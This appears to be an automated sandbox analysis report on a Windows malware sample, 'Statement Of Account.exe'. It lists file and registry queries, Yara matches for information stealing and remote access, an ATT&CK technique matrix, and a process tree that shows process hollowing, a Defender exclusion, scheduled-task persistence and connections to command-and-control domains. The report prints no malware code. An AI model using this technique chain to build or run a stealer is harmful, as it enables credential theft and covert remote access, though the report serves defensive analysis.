          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Queries volume information: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Mitre Att&ck matrix, listed per tactic column (the counts shown beside a technique in the original matrix are kept in front of its name):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Scheduled Task/Job; 1 Shared Modules; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 812 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Rootkit; 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 812 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 221 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 112 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Credential API Hooking; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; 4 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1430501; Sample: Statement Of Account.exe; Startdate: 23/04/2024; Architecture: WINDOWS; Score: 100)

Top-level DNS/IP info: www.zdryueva.com; www.bodution.website; 4 other IPs or domains
Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures

Process tree recovered from the graph:

• Statement Of Account.exe (started)
  • Dropped: C:\Users\user\AppData\Roaming\SdYCcXyq.exe (PE32); C:\Users\user\AppData\Local\...\tmp9A8F.tmp (XML)
  • Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
  • RegSvcs.exe (started)
    • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
    • explorer.exe (injected)
      • DNS/IP: www.airzf.com 154.12.38.29, 49748, 80, UNMETEREDCA, United States; www.b-a-s-e.net 91.195.240.94, 49750, 80, SEDO-ASDE, Germany; td-ccm-neg-87-45.wixdns.net 34.149.87.45, 49751, 80, ATGS-MMD-ASUS, United States
      • Signature: System process connects to network (likely due to code injection or exploit)
      • cmstp.exe (started)
        • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe (started)
          • conhost.exe (started)
      • colorcpl.exe (started)
  • powershell.exe (started)
    • Signature: Loading BitLocker PowerShell Module
    • WmiPrvSE.exe (started)
    • conhost.exe (started)
  • powershell.exe (started)
    • conhost.exe (started)
  • schtasks.exe (started)
    • conhost.exe (started)
• SdYCcXyq.exe (started)
  • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  • RegSvcs.exe (started)
  • schtasks.exe (started)
    • conhost.exe (started)

Source | Detection | Scanner | Label | Link
Statement Of Account.exe | 24% | ReversingLabs
Statement Of Account.exe | 100% | Joe Sandbox ML

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\SdYCcXyq.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\SdYCcXyq.exe | 24% | ReversingLabs

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://schemas.micr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
